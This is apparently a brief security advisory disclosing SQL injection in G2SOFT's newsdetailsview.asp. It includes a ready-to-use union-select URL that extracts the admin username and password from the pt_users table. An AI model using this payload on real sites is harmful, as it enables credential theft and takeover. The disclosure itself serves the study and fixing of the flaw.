Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query to
newsdetailsview.asp.
Level: Critical
How&Example:
GET -> http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20[SQLCode]
EXAMPLE ->
http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0
%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes
With this example remote attacker could get admin's username and password.